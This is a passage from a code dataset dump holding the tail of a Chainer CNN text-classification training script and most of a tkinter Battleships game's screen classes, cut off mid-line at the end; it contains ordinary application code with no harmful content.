--epoch >= 1')\n if (args.batchsize < 1):\n raise ValueError('you must set --batchsize >= 1')\n if (args.cross_varidation < 2):\n raise ValueError('you must set --cross_varidation >= 2')\n if (args.n_filter < 1):\n raise ValueError('you must set --n_filter >= 1')\n if (args.w_filter < 1):\n raise ValueError('you must set --w_filter >= 1')\n if (args.n_embed < 1):\n raise ValueError('you must set --n_embed >= 1')\n\n if (args.static is False) and (args.non_static is False):\n raise ValueError(\n 'you muset use --static or --non-static or both')\n except Exception as ex:\n print(ex, file=sys.stderr)\n sys.exit()\n\n return args\n\n\ndef l2_constrain(W, s=3.0):\n # constrain l2-norms of the weight vectors\n # by rescaling w to have ||w||2 = s whenever ||w||2 > s\n l2_norm = sum(reduce(lambda x, y: x+y, W**2))\n if l2_norm > s:\n W = W / np.sqrt(l2_norm) * np.sqrt(s)\n\n\ndef train_model(args, model, train_data, train_labels, dev_data=None, dev_labels=None):\n trace('start training ...')\n\n for epoch in xrange(args.epoch):\n perm = np.random.permutation(len(train_data))\n trace('epoch %d/%d: ' % (epoch + 1, args.epoch))\n trained = 0\n mean_loss = 0\n for i in xrange(0, len(train_data), args.batchsize):\n x_batch = train_data[perm[i:i + args.batchsize]]\n t_batch = train_labels[perm[i:i + args.batchsize]]\n if args.gpu >= 0:\n x_batch = cuda.to_gpu(x_batch)\n t_batch = cuda.to_gpu(t_batch)\n loss = model.train(x_batch, t_batch)\n mean_loss += (loss.data / len(x_batch))\n trained += len(x_batch)\n l2_constrain(model.model.linear.W, s=3)\n sys.stderr.write(\"\\rtrained %d / %d\" % (trained, len(train_data)))\n sys.stderr.flush()\n sys.stderr.write(\"\\n\")\n trace(\"epoch: %d, train_mean_loss = %.6f \" %\n (epoch + 1, float(mean_loss)))\n if dev_data is not None:\n test_model(args, model, dev_data, dev_labels)\n\n trace('finished training.')\n\n\ndef test_model(args, model, test_data, test_labels):\n trace('calculate accuracy ...')\n\n sum_acc = 0\n for i in xrange(0, len(test_data), args.batchsize):\n x_batch = test_data[i:i + args.batchsize]\n t_batch = test_labels[i:i + args.batchsize]\n if args.gpu >= 0:\n x_batch = cuda.to_gpu(x_batch)\n t_batch = cuda.to_gpu(t_batch)\n acc = model.predict(x_batch, t_batch)\n sum_acc += acc.data * len(x_batch)\n\n trace('finished.')\n trace(\"accuracy = %.6f\" % float(sum_acc/len(test_data)))\n\n\ndef main():\n args = parse_args()\n\n trace('initializing ...')\n if args.gpu >= 0:\n cuda.check_cuda_available()\n\n file_dir = \"./\"\n vocab, x_data, y_data = process_mr_data(file_dir, args.cross_varidation)\n\n trace('embeddings are initialized by: %s' % str(args.w2v_model))\n trace('n_epoch: %d' % args.epoch)\n trace('n_filter: %d' % args.n_filter)\n trace('w_filter: %s' % args.w_filter)\n\n w_filter = [int(w) for w in str(args.w_filter).split(\",\")]\n pad = max(w_filter)-1\n # load word2vec_model\n if args.w2v_model == \"rand\":\n trace(\"word embeddings are randomly initialized\")\n word2vec_vocab = {}\n else:\n trace(\"load word2vec model...: %s\" % (args.w2v_model))\n word2vec_vocab = load_bin_vec(args.w2v_model, vocab)\n trace(\"finished.\")\n\n for i in xrange(args.cross_varidation):\n trace(\"cross_varidation: %d\" % (i+1))\n\n model = WordLevelCNN.new(len(vocab), n_embed=args.n_embed,\n n_filter=args.n_filter, w_filter=w_filter,\n static=args.static, non_static=args.non_static)\n model.init_embed(word2vec_vocab, vocab)\n model.init_optimizer()\n if args.gpu >= 0:\n cuda.get_device(args.gpu).use()\n model.model.to_gpu()\n\n test_x = np.array(format_input(x_data[i], pad, vocab), dtype=np.int32)\n test_y = np.array(y_data[i], dtype=np.int32)\n # dev_x = x_data[i+1]\n # dev_y = y_data[i+1]\n train_x = reduce(lambda a, b: a+b, x_data[:i]+x_data[i+1:])\n train_y = reduce(lambda a, b: a+b, y_data[:i]+y_data[i+1:])\n train_x = np.array(format_input(train_x, pad, vocab), dtype=np.int32)\n train_y = np.array(train_y, dtype=np.int32)\n\n train_model(args, model, train_x, train_y)\n test_model(args, model, test_x, test_y)\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"320499128","text":"# # # # # # # # # # # # # # # # # # # #\r\n#\r\n# Created 11th June 2018, Raymond Feng\r\n#\r\n# Updated: 22nd July 2018\r\n#\r\n# Purpose: Main battleships game class\r\n#\r\n# # # # # # # # # # # # # # # # # # # #\r\n\r\n# Current version of the program.\r\nversion = 2.21\r\n\r\n\r\nimport tkinter as tk\r\nimport random\r\nimport datetime\r\nimport os.path\r\n\r\n# Custom widgets module\r\nfrom frameworks.custom_widgets import *\r\n\r\n\r\n### Function for switching between different screens ###\r\n# – Screens can be of splash, setup, game (with 'Game' object arg)\r\n# – Note: All screens (splash, setup etc.) are of type tk.Frame\r\n#####\r\ndef switch_screen(screen, args=None):\r\n global current_screen\r\n\r\n # If there was previously a screen, destroy that screen\r\n if current_screen != None: current_screen.destroy()\r\n\r\n if screen == 'splash': current_screen = SplashScreen(root)\r\n elif screen == 'setup': current_screen = SetupWindow(root)\r\n elif screen == 'game': current_screen = GameWindow(root, args)\r\n\r\n # Packs the new screen frame into the root window\r\n current_screen.pack()\r\n\r\n # Temporary white frame to hide widgets being destroyed\r\n white = tk.Frame(root, bg='white', width=1000, height=1000)\r\n white.place(x=0, y=0, anchor='nw')\r\n\r\n root.after(50, white.destroy)\r\n\r\n\r\n### Splash screen to load a saved game, start a new game or view scoreboard ###\r\nclass SplashScreen(tk.Frame):\r\n def __init__(self, parent):\r\n super().__init__(parent)\r\n\r\n # Uses the colour theme defined at startup\r\n theme = Colours(manager.theme)\r\n\r\n # Horizontal bar (aesthetic)\r\n self.bar = tk.Frame(self, width=800, height=25, bg=theme.GRAY_DARK)\r\n self.bar.pack(side='top', pady=(60, 0))\r\n\r\n # Title (aesthetic)\r\n self.title = tk.Label(self, text=\"BATTLESHIPS\", font=(\"Tw Cen MT\", 100, \"bold\"), fg=theme.GRAY_BLACK)\r\n self.title.pack(side='top', padx=(26, 240), pady=(20, 10))\r\n\r\n # Container for all other elements beneath title\r\n self.main_frame = tk.Frame(self, width=750, height=320, bg=theme.WHITE)\r\n self.main_frame.pack(side='bottom')\r\n\r\n self.main_frame.grid_propagate(0)\r\n self.main_frame.grid_columnconfigure(0, weight=1)\r\n self.main_frame.grid_columnconfigure(1, weight=0)\r\n\r\n # Lefthand side rounded frame for displaying information and scoreboards #\r\n info_canvas = tk.Canvas(self.main_frame, width=480, height=320, highlightthickness=0)\r\n info_canvas.grid(column=0, row=0, sticky='nw')\r\n\r\n # Creates a rounded rectangle (aesthetic)\r\n rounded_rect(info_canvas, 0, 0, int(info_canvas[\"width\"]), int(info_canvas[\"height\"]), 50, colour=theme.GRAY_LIGHT)\r\n\r\n # Outer information text, static\r\n info_text = ['>bBeta Release V{:.2f}'.format(version),\r\n '>lSCOREBOARD',\r\n '', '', '', '', '',\r\n '\\n',\r\n '>sDesigned by Raymond Feng, 2018.',\r\n '>sGo to http://www.spprax.com to find out more']\r\n\r\n scoreboard_text = ['']\r\n\r\n # Appends all the scores for different difficulties into scoreboard_text\r\n for mode in ('easy', 'normal', 'hard', 'master'):\r\n scoreboard_text.append('{} Mode:\\t{} wins – {} losses'.format(mode.upper(),\r\n manager.stats[mode][0],\r\n manager.stats[mode][1]))\r\n\r\n # Creates a frame with labels for every element in info_text\r\n info_labels = CustomLongText(info_canvas, text=info_text, height=270, width=400,\r\n fg=theme.GRAY_BLACK, bg=theme.GRAY_LIGHT)\r\n info_canvas.create_window(int(info_canvas[\"width\"]) / 2, int(info_canvas['height']) / 2,\r\n window=info_labels, anchor='center', tag='window')\r\n\r\n # Creates a frame with labels for every element in scoreboard_text\r\n scoreboard_labels = CustomLongText(info_canvas, text=scoreboard_text, height=140, width=400,\r\n fg=theme.GRAY_BLACK, bg=theme.WHITE)\r\n info_canvas.create_window(int(info_canvas['width']) / 2, int(info_canvas['height']) / 2 + 10,\r\n window=scoreboard_labels, anchor='center', tag='window')\r\n\r\n def reset():\r\n manager.reset_scores()\r\n switch_screen('splash')\r\n\r\n reset_score_button = CustomButton(info_canvas, text=\"Reset Scores\", width=90, height=40, font=(\"Tw Cen MT\", 12),\r\n colour=theme.GRAY, fg=theme.WHITE, active=theme.GRAY_DARK, bg_canvas=theme.GRAY_LIGHT)\r\n\r\n reset_score_button.bind_to_click(reset)\r\n info_canvas.create_window(440, 295, window=reset_score_button, anchor='se', tag='window')\r\n\r\n # Right hand side frame, acts as a buttons container #\r\n buttons_container = tk.Frame(self.main_frame, width=256, height=int(self.main_frame[\"height\"]))\r\n buttons_container.grid(column=1, row=0, sticky='nw')\r\n buttons_container.pack_propagate(False)\r\n\r\n # Creates a button to start a new game, switching to setup window\r\n new_game_button = CustomButton(buttons_container, text=\"New Game\", width=250, height=80,\r\n colour=theme.CYAN, fg=theme.WHITE, active=theme.CYAN_DARK)\r\n new_game_button.bind_to_click(lambda: switch_screen('setup'))\r\n new_game_button.place(x=0, y=-1, anchor='nw')\r\n\r\n # Creates a button to open saves frame\r\n load_button = CustomButton(buttons_container, text=\"Load Saved\", width=250, height=80,\r\n colour=theme.TURQUOISE, fg=theme.WHITE, active=theme.TURQUOISE_DARK)\r\n load_button.place(x=0, y=84, anchor='nw')\r\n\r\n # Creates a button to destroy application window\r\n close_button = CustomButton(buttons_container, text=\"✘\", width=80, height=60,\r\n colour=theme.RED, fg=theme.WHITE, active=theme.RED_DIM)\r\n close_button.place(x=251, y=int(self.main_frame[\"height\"]), anchor=\"se\")\r\n close_button.bind_to_click(lambda: root.destroy())\r\n\r\n # Function called when 'load saves' button is pressed #\r\n def load_screen():\r\n\r\n # Makes a 'saves frame'\r\n saves = SavesFrame(info_canvas)\r\n\r\n # Deletes all canvas items with tag 'window' (i.e all canvas elements)\r\n info_canvas.delete('window')\r\n load_button.destroy()\r\n\r\n # Creates a new window for saves\r\n info_canvas.create_window(240, 160, window=saves, anchor='center', tag='window')\r\n\r\n # Redefines close_button as back button to splash\r\n close_button = CustomButton(buttons_container, text=\"⏎\", width=80, height=60,\r\n colour=theme.GOLD, fg=theme.WHITE, active=theme.GOLD_DARK)\r\n close_button.place(x=251, y=int(self.main_frame[\"height\"]), anchor=\"se\")\r\n close_button.bind_to_click(lambda: switch_screen('splash'))\r\n\r\n load_button.bind_to_click(load_screen)\r\n\r\n\r\n### Frame within splash saves, inside the splash screen ###\r\nclass SavesFrame(tk.Frame):\r\n def __init__(self, parent):\r\n theme = Colours(manager.theme)\r\n super().__init__(parent)\r\n self[\"bg\"] = theme.GRAY_LIGHT\r\n\r\n # Function to delete a save after 'delete' button is pressed #\r\n def delete(save, index):\r\n\r\n # Destroys all elements within the individual save frame\r\n for child in save.winfo_children():\r\n child.destroy()\r\n\r\n # Resets the ind. save frame into an empty save\r\n save[\"bg\"] = theme.GRAY\r\n new_id = tk.Label(save, text=\"EMPTY SAVE\", font=(\"Tw Cen MT\", 12), fg=theme.WHITE, bg=theme.GRAY)\r\n new_id.place(x=10, y=5, anchor='nw')\r\n\r\n # Deletes the saved game from manager's storage\r\n del manager.saved_games[index]\r\n\r\n # Function to open a save when 'open' button is pressed #\r\n def open_save(save, index):\r\n\r\n # Makes a new game and imports the data from manager's storage\r\n game = Game()\r\n game.import_data(manager.saved_games[index])\r\n switch_screen('game', game)\r\n\r\n # Deletes the saved game from manager's storage\r\n del manager.saved_games[index]\r\n\r\n # Creates 3 individual save frames with varying elements inside\r\n for i in range(3):\r\n save = None\r\n\r\n bg = theme.GRAY\r\n\r\n # If manager's storage has save, make the frame white and make it the current save\r\n if len(manager.saved_games) > i:\r\n bg = theme.WHITE\r\n save = manager.saved_games[i]\r\n\r\n # Creates an individual save frame\r\n save_frame = tk.Frame(self, width=400, height=80, bg=bg)\r\n\r\n # Array for laziness... Makes all similar labels have the same colour font\r\n similar_labels = []\r\n\r\n # ID label (i.e \"SAVE #1\")\r\n id_label = tk.Label(save_frame, text=\"{}SAVE #{}\".format(\"\" if save else \"EMPTY \", i + 1),\r\n font=(\"Tw Cen MT\", 12))\r\n similar_labels.append(id_label)\r\n id_label.place(x=10, y=5, anchor='nw')\r\n\r\n # If a save exists, add these elements to the save frame\r\n if save:\r\n\r\n # The date\r\n date_label = tk.Label(save_frame, text=save[\"date\"].strftime('%A %-I:%M%p, %d %b %Y'),\r\n font=(\"Tw Cen MT\", 12))\r\n similar_labels.append(date_label)\r\n date_label.place(x=390, y=5, anchor='ne')\r\n\r\n # The difficulty mode label\r\n mode_label = tk.Label(save_frame, text=\"Difficulty\", font=(\"Tw Cen MT\", 16))\r\n similar_labels.append(mode_label)\r\n mode_label.place(x=30, y=45, anchor='w')\r\n\r\n # The difficulty mode\r\n mode = tk.Label(save_frame, text=save[\"difficulty\"].upper(), font=(\"Tw Cen MT\", 20, \"bold\"))\r\n similar_labels.append(mode)\r\n mode.place(x=90, y=45, anchor='w')\r\n\r\n # Checks how many ships on player's board have been hit\r\n player_count = 0\r\n for ship in save[\"player_ships\"]:\r\n for coord in save[\"player_hit\"]:\r\n if coord in ship:\r\n player_count += 1\r\n\r\n # Checks how many ships on computer's board have been hit\r\n comp_count = 0\r\n for ship in save[\"computer_ships\"]:\r\n for coord in save[\"computer_hit\"]:\r\n if coord in ship:\r\n comp_count += 1\r\n\r\n # Finds the maximum of the two counts, can be used\r\n # as a crude measure of game's progress to completion\r\n avg_game = round(max(player_count * 100/ 17, comp_count * 100 / 17), 1)\r\n avg_game_label = tk.Label(save_frame, text=\"{}% of game completed\".format(avg_game),\r\n font=(\"Tw Cen MT\", 12))\r\n similar_labels.append(avg_game_label)\r\n avg_game_label.place(x=30, y=60, anchor='w')\r\n\r\n # Creates a delete button on each frame, to delete the save\r\n delete_button = CustomButton(save_frame, text=\"Delete\", width=60, height=30, font=(\"Tw Cen Mt\", 12),\r\n fg=theme.WHITE, colour=theme.RED, active=theme.RED_DIM)\r\n delete_button.place(x=390, y=65, anchor='se')\r\n delete_button.bind_to_click(lambda arg=save_frame, arg2=i: delete(arg, arg2))\r\n\r\n # Creates a button to open each save into a game window\r\n open_button = CustomButton(save_frame, text=\"Open\", width=60, height=30, font=(\"Tw Cen MT\", 12),\r\n fg=theme.WHITE, colour=theme.GREEN, active=theme.GREEN_DIM)\r\n open_button.place(x=325, y=65, anchor='se')\r\n open_button.bind_to_click(lambda arg=save_frame, arg2=i: open_save(arg, arg2))\r\n\r\n # Changes font fg and bg of all predefined 'similar' labels\r\n for label in similar_labels:\r\n label[\"fg\"] = theme.GRAY_BLACK if save else theme.WHITE\r\n label[\"bg\"] = bg\r\n\r\n # Places each individual save frame into the big save grid (self)\r\n save_frame.grid(column=0, row=i, pady=(0, 5))\r\n\r\n\r\n### Board setup Window ###\r\nclass SetupWindow(tk.Frame):\r\n ### NB: The SetupWindow frame is split into 3 main column areas.\r\n # The first column area is for the progress bar (UNUSED IN SETUP)\r\n # The second column area is for the main game grid and ships container\r\n # The third column area is for help information, mode selection and other buttons\r\n ###\r\n\r\n def __init__(self, parent):\r\n super().__init__(parent)\r\n\r\n theme = Colours(manager.theme)\r\n\r\n # Creates a new game object\r\n self.game = Game()\r\n\r\n # Left container for the progress bar and some info text #\r\n progress_container = tk.Frame(self, bg=theme.GRAY_LIGHT, height=570)\r\n progress_container.grid(column=0, row=0, sticky='n', pady=15)\r\n progress_container.pack_propagate(False)\r\n\r\n # Label for progress bar\r\n progress_label = tk.Label(progress_container, text=\"Battleships\\nRemaining\", font=(\"Tw Cen Mt\", 24, \"bold\"),\r\n fg=theme.GRAY_DARK, bg=theme.GRAY_LIGHT)\r\n progress_label.pack(side='bottom', pady=(10, 20))\r\n\r\n # Actual progress bar\r\n self.progress_bar = ProgressBar(progress_container, direction=\"down\",\r\n colours=(theme.GRAY, theme.GRAY_BLACK), bg_canvas=theme.GRAY_LIGHT)\r\n self.progress_bar.pack(side='bottom')\r\n\r\n # Linking progress bar width to bounding countainer (progress_container)\r\n progress_container[\"width\"] = int(self.progress_bar[\"width\"]) + 20\r\n\r\n\r\n # Middle container for the grid and ships #\r\n main_container = tk.Frame(self, bg=theme.WHITE)\r\n main_container.grid(column=1, row=0, padx=10, pady=15)\r\n\r\n # The setup grid for player to place ships on\r\n self.main_grid = CustomGrid(main_container, multiplier=4,\r\n progress_bar=self.progress_bar, bottom_hidden=True, is_game_board=False)\r\n self.main_grid.pack()\r\n\r\n # The black bottom bar for player to select ships\r\n ships_container = tk.Canvas(main_container, width=int(self.main_grid[\"width\"]), height=130,\r\n highlightthickness=0, bg=theme.GRAY_DARK)\r\n\r\n self.current_ship_selection = None\r\n\r\n # Gets the length of the ship that's been clicked\r\n def return_current_length(ship):\r\n\r\n # If a new ship is clicked, unselect current ship\r\n if self.main_grid.selection_length != 0:\r\n self.current_ship_selection.selected = False\r\n self.current_ship_selection.unhover(None)\r\n\r\n # Sets the length to be used on the setup grid as length of new ship\r\n self.main_grid.selection_length = ship.length\r\n self.main_grid.selection_dir = ship.dir\r\n\r\n # Sets currently selected ship as current selected ship\r\n self.current_ship_selection = ship\r\n\r\n # Defines all the ships (length and direction), and their positions in ship container\r\n self.ships = [Ship(ships_container, 40, 15, length=2, dir='v'),\r\n Ship(ships_container, 90, 15, length=3, dir='v'),\r\n Ship(ships_container, 140, 15, length=3, dir='v'),\r\n Ship(ships_container, 220, 15, length=5),\r\n Ship(ships_container, 220, 65, length=4)]\r\n\r\n ships_container.pack(pady=(0, 10))\r\n\r\n # Binds length changer to a ship being clicked\r\n for ship in self.ships: ship.bind_to_click(return_current_length)\r\n\r\n\r\n ## Right container for the small grid and button/info display ##\r\n right_container = tk.Frame(self)\r\n right_container.grid(column=2, row=0, sticky='n', pady=15)\r\n\r\n # Container for the help guide and text\r\n help_container = tk.Frame(right_container, bg=theme.GRAY_BLACK, width=220, height=200)\r\n help_container.pack(side='top', pady=(0, 10))\r\n\r\n # 'SETUP GUIDE' label\r\n help_label = tk.Label(help_container, text=\"SETUP GUIDE\", font=(\"Tw Cen MT\", 20, \"bold\"),\r\n bg=theme.GRAY_BLACK, fg=theme.WHITE)\r\n help_label.pack(pady=(8, 2))\r\n\r\n # Places all the help text\r\n help_text = ['1) Click on a white ship to select, '\r\n '\\nthen hover over grid to set ship.',\r\n '\\n2) Rotate a ship by right-clicking\\n on the grid.',\r\n '\\n3) Click mode to toggle difficutly.']\r\n help_desc = CustomLongText(help_container, text=help_text, width=220, height=160,\r\n bg=theme.GRAY_DARK, fg=theme.WHITE, side='left')\r\n help_desc[\"pady\"] = 10\r\n help_desc.pack()\r\n\r\n # Container for the difficulty toggle box\r\n difficulty_container = tk.Frame(right_container, width=220, height=52, bg=theme.GRAY_DARK)\r\n difficulty_container.pack(pady=(0, 10))\r\n difficulty_container.pack_propagate(0)\r\n\r\n # 'MODE SELECTION' Label for the difficulty toggle\r\n difficulty_label = tk.Label(difficulty_container, text=\"MODE\\nSELECTION\", font=(\"Tw Cen MT\", 12, \"bold\"),\r\n fg=theme.WHITE, bg=theme.GRAY_DARK, anchor='e', justify='right')\r\n difficulty_label.pack(side='left', padx=(10, 0))\r\n\r\n # Defines the startup position of the mode, as NORMAL\r\n difficulty_button = tk.Label(difficulty_container, text='NORMAL', font=(\"Tw Cen MT\", 24, \"bold\"),\r\n fg=theme.WHITE, bg=theme.GRAY_BLACK, width=12, height=2, padx=20)\r\n difficulty_button.pack(side='left', padx=(10, 0))\r\n\r\n self.difficulty_colour = theme.GRADIENT[1]\r\n\r\n # Changes the difficulty if the mode dial is clicked #\r\n def difficulty_change():\r\n modes = ['easy', 'normal', 'hard', 'master']\r\n\r\n # Checks to see what the current difficulty is\r\n current_index = modes.index(difficulty_button[\"text\"].lower())\r\n\r\n # If the current difficulty is 'master', set new difficulty to 'easy'\r\n # If current difficulty isn't 'master', go to next difficulty in 'modes' array\r\n if modes[-1] == difficulty_button[\"text\"].lower():\r\n self.game.difficulty = modes[0]\r\n else:\r\n self.game.difficulty = modes[current_index + 1]\r\n\r\n # Sets the new button text and look to match new difficulty\r\n self.difficulty_colour = theme.GRADIENT[modes.index(self.game.difficulty)]\r\n difficulty_button[\"bg\"] = self.difficulty_colour\r\n difficulty_button[\"text\"] = self.game.difficulty.upper()\r\n\r\n # Binds event handlers (aesthetic and click) to the difficulty toggle\r\n difficulty_button.bind(\"\", lambda event: difficulty_button.config(bg=self.difficulty_colour))\r\n difficulty_button.bind(\"\", lambda event: difficulty_button.config(bg=theme.GRAY_BLACK))\r\n difficulty_button.bind(\"\", lambda event: difficulty_change())\r\n\r\n # Container for buttons 'RESET BOARD' and 'GO!'\r\n info_frame = tk.Frame(right_container, bg=theme.GRAY_LIGHT, width=220, height=230)\r\n info_frame.pack()\r\n info_frame.pack_propagate(0)\r\n\r\n # Function to be called when board is reset #\r\n def reset_board():\r\n\r\n # Wipes everything off the main grid\r\n self.main_grid.update_canvas()\r\n\r\n # Sets current selection to none\r\n self.main_grid.selection = []\r\n self.main_grid.selection_length = 0\r\n self.main_grid.selection_dir = 'h'\r\n\r\n # Resets states of all ships in ship container\r\n for ship in self.ships:\r\n ship.selected = False\r\n ship.unhover(None)\r\n\r\n # Creates 'RESET BOARD' button\r\n reset_board_button = CustomButton(info_frame, text=\"RESET BOARD\", height=40, width=200, align='center',\r\n colour=theme.ORANGE, fg=theme.ORANGE_DARK, active=theme.ORANGE_DIM,\r\n font=(\"Tw Cen MT\", 20, \"bold\"), bg_canvas=theme.GRAY_LIGHT)\r\n reset_board_button.pack(pady=10)\r\n reset_board_button.bind_to_click(reset_board)\r\n\r\n # Function to be called when game is to start #\r\n def start_game():\r\n\r\n # Checks if all ships have been placed (by checking if there are any\r\n # unselected ships in ships container), creates popup if not true\r\n for ship in self.ships:\r\n if ship.selected == False:\r\n popup = Popup(parent, text=\"All ships must be placed!\", bg=theme.RED, fg=\"white\")\r\n break\r\n\r\n # Sets player ships to setup grid's current custom layout\r\n # Auto-generates a new layout for the computer (based on computer_logic brain)\r\n else:\r\n self.game.add_player_ships(self.main_grid.selection)\r\n self.game.add_computer_ships(self.game.computer_logic.generate_layout())\r\n\r\n # Switches the app screen to 'game' window with created game\r\n switch_screen('game', args=self.game)\r\n\r\n # Creates 'GO!' button\r\n start_game_button = CustomButton(info_frame, text=\"GO!\", height=150, width=200,\r\n colour=theme.GREEN, fg=theme.GREEN_DARK, active=theme.GREEN_DIM,\r\n font=(\"Tw Cen MT\", 40, \"bold\"), bg_canvas=theme.GRAY_LIGHT)\r\n start_game_button.bind_to_click(start_game)\r\n start_game_button.pack(pady=(0, 10))\r\n\r\n # Control frame is a container for any application related queries\r\n # like exiting from the game or going back to startup splash\r\n control_frame = tk.Frame(right_container, bg=theme.GRAY_LIGHT, width=220, height=60)\r\n control_frame.pack(pady=10)\r\n\r\n # Back to splash – child of control frame\r\n back_button = CustomButton(control_frame, text=\"⏎\", width=120, height=40,\r\n colour=theme.GOLD, fg=theme.WHITE, active=theme.GOLD_DARK,\r\n bg_canvas=theme.GRAY_LIGHT)\r\n back_button.place(x=10, y=51, anchor='sw')\r\n back_button.bind_to_click(lambda: switch_screen('splash'))\r\n\r\n # Close entire application – child of control frame\r\n close_button = CustomButton(control_frame, text=\"✘\", width=70, height=40,\r\n colour=theme.RED, fg=theme.WHITE, active=theme.RED_DIM,\r\n bg_canvas=theme.GRAY_LIGHT)\r\n close_button.place(x=210, y=51, anchor=\"se\")\r\n close_button.bind_to_click(lambda: root.destroy())\r\n\r\n\r\n### The main Game Window ###\r\nclass GameWindow(tk.Frame):\r\n ### NB: The GameWindow frame is split into 3 main column areas.\r\n # The first column area is for the progress bar.\r\n # The second column area is for the main game grid and ships container\r\n # The third column area is for the display grid, as well as the game stats\r\n ###\r\n\r\n def __init__(self, parent, game):\r\n super().__init__(parent)\r\n\r\n theme = Colours(manager.theme)\r\n self.game = game\r\n\r\n # Left container for the progress bar and text #\r\n progress_container = tk.Frame(self, bg=theme.GRAY_LIGHT, height=570)\r\n progress_container.grid(column=0, row=0, sticky='n', pady=15)\r\n progress_container.pack_propagate(False)\r\n\r\n # Label for progress bar\r\n progress_label = tk.Label(progress_container, text=\"Opponent\\nShips\", font=(\"Tw Cen Mt\", 24, \"bold\"),\r\n fg=theme.GRAY_BLACK, bg=theme.GRAY_LIGHT)\r\n progress_label.pack(side='bottom', pady=(10, 20))\r\n\r\n # Actual progress bar\r\n self.progress_bar = ProgressBar(progress_container, direction=\"down\",\r\n colours=(theme.RED, theme.RED_DARK), bg_canvas=theme.GRAY_LIGHT)\r\n self.progress_bar.pack(side='bottom')\r\n\r\n # Linking progress bar width to bounding countainer (progress_container)\r\n progress_container[\"width\"] = int(self.progress_bar[\"width\"]) + 20\r\n\r\n\r\n # Middle container for the grid and ships #\r\n main_container = tk.Frame(self, bg=theme.WHITE)\r\n main_container.grid(column=1, row=0, padx=10, pady=15)\r\n\r\n # Computer's grid (the grid that the player tries to find ships on)\r\n self.main_grid = CustomGrid(main_container, multiplier=4,\r\n progress_bar=self.progress_bar, bottom_hidden=True,\r\n is_game_board=True, game=self.game, owner='computer')\r\n self.game.computer_board = self.main_grid\r\n self.main_grid.pack()\r\n\r\n # Filler space for aesthetic purpose, contains last hit coord\r\n bottom_filler = tk.Frame(main_container, width=int(self.main_grid[\"width\"]), height=130,\r\n highlightthickness=0, bg=theme.GRAY_DARK)\r\n bottom_filler.pack_propagate(0)\r\n bottom_filler.pack(pady=(0, 10))\r\n\r\n # Last location that the player has hit\r\n last_location = tk.Label(bottom_filler, text=\"––\",\r\n fg=theme.WHITE, bg=theme.GRAY_BLACK,\r\n font=(\"Tw Cen MT\", 60, \"bold\"), height=2, width=4)\r\n\r\n # Links the last_location label with the main_grid's logic\r\n self.main_grid.linked_coordinate = last_location\r\n\r\n last_label = tk.Label(bottom_filler, text=\"Last Location\", fg=theme.WHITE, bg=theme.GRAY_DARK,\r\n font=(\"Tw Cen MT\", 24, \"bold\"))\r\n last_location.pack(side='left')\r\n last_label.pack(side='left', padx=20)\r\n\r\n\r\n # Right container for the small grid and button/info display #\r\n right_container = tk.Frame(self)\r\n right_container.grid(column=2, row=0, sticky='n', pady=15)\r\n\r\n # Container for the player's grid\r\n small_grid_container = tk.Frame(right_container)\r\n small_grid_container.pack(side='top', pady=(0, 10))\r\n\r\n # Player's grid\r\n self.small_grid = CustomGrid(small_grid_container, multiplier=2, progress_bar=None,\r\n disabled=True, bottom_hidden=True, game=self.game, owner='player')\r\n self.game.player_board = self.small_grid\r\n self.small_grid.pack(side='top')\r\n\r\n # Shows all the ships on the board\r\n self.small_grid.show_hidden_ships()\r\n\r\n # Information container that belongs to the player's grid\r\n small_grid_info = tk.Frame(small_grid_container, width=220, height=40, bg=theme.GRAY_BLACK)\r\n small_grid_info.pack()\r\n small_grid_info.grid_propagate(0)\r\n\r\n # Generic text – static\r\n tk.Label(small_grid_info, text=\"YOUR\\nTERRITORY\", justify='right',\r\n font=(\"Tw Cen MT\", 13, \"bold\"), fg=theme.WHITE,\r\n bg=theme.GRAY_BLACK).grid(column=0, row=0, sticky='w', padx=10)\r\n\r\n tk.Label(small_grid_info, text=\"HIT\", fg=theme.WHITE, bg=theme.GRAY_BLACK,\r\n font=(\"Tw Cen MT\", 12, \"bold\")).grid(column=2, row=0, sticky='e',\r\n padx=(5, 0), pady=(14, 0))\r\n\r\n # Percentage of player ships sunk\r\n percentage_text = tk.Label(small_grid_info, text=\"0.00%\", fg=theme.GREEN, bg=theme.GRAY_BLACK,\r\n font=(\"Tw Cen MT\", 30, \"bold\"))\r\n percentage_text.grid(column=1, row=0, sticky='e')\r\n self.small_grid.linked_percentage = percentage_text\r\n\r\n # Stats about the current difficulty mode\r\n small_grid_details = tk.Frame(small_grid_container, width=220, height=130,\r\n bg=theme.GRAY_LIGHT, highlightthickness=10, highlightbackground=theme.GRAY)\r\n small_grid_details.pack()\r\n small_grid_details.pack_propagate(0)\r\n\r\n # Array of all details display text about the difficulty stats\r\n details = ['>bCURRENT STATS',\r\n 'Games won: {1} out of {0}\\n'\r\n 'Games lost: {2} out of {0}'.format(manager.stats[self.game.difficulty][0] + manager.stats[self.game.difficulty][1],\r\n manager.stats[self.game.difficulty][0],\r\n manager.stats[self.game.difficulty][1]),\r\n 'Difficulty: {}'.format(game.difficulty.upper())]\r\n\r\n # Defines custom font types for the window\r\n fonts = {\">b\": (\"Tw Cen MT\", 14, \"bold\"),\r\n \"default\": (\"Tw Cen MT\", 14)}\r\n\r\n # Creates a frame with labels for every details text\r\n longlabel = CustomLongText(small_grid_details, text=details,\r\n fg=theme.GRAY_BLACK, bg=theme.GRAY_LIGHT,\r\n width=200, height=110, fonts=fonts)\r\n longlabel.pack(pady=15)\r\n\r\n # Container for who's turn it currently is\r\n info_frame = tk.Frame(right_container, bg=theme.GRAY_BLACK, width=220, height=100)\r\n info_frame.pack()\r\n info_frame.pack_propagate(0)\r\n\r\n # Label for who's turn it currently is\r\n turn_status = tk.Label(info_frame, text=\"PLAYER's\", fg=theme.RED,\r\n font=(\"Tw Cen MT\", 30, \"bold\"), width=12)\r\n turn_status.pack(side='top', pady=(20, 0), ipady=5)\r\n\r\n # Links the game's turn status to the label created above\r\n self.game.status = turn_status\r\n\r\n # Generic text – static\r\n tk.Label(info_frame, text=\"TURN\", fg=theme.GRAY_LIGHT,\r\n font=(\"Tw Cen MT\", 14, \"bold\"), bg=theme.GRAY_BLACK).pack()\r\n\r\n # Control frame with options to resign and close game\r\n control_frame = tk.Frame(right_container, bg=theme.GRAY_LIGHT, width=220, height=60)\r\n control_frame.pack(pady=10)\r\n\r\n # Button to resign from game (default 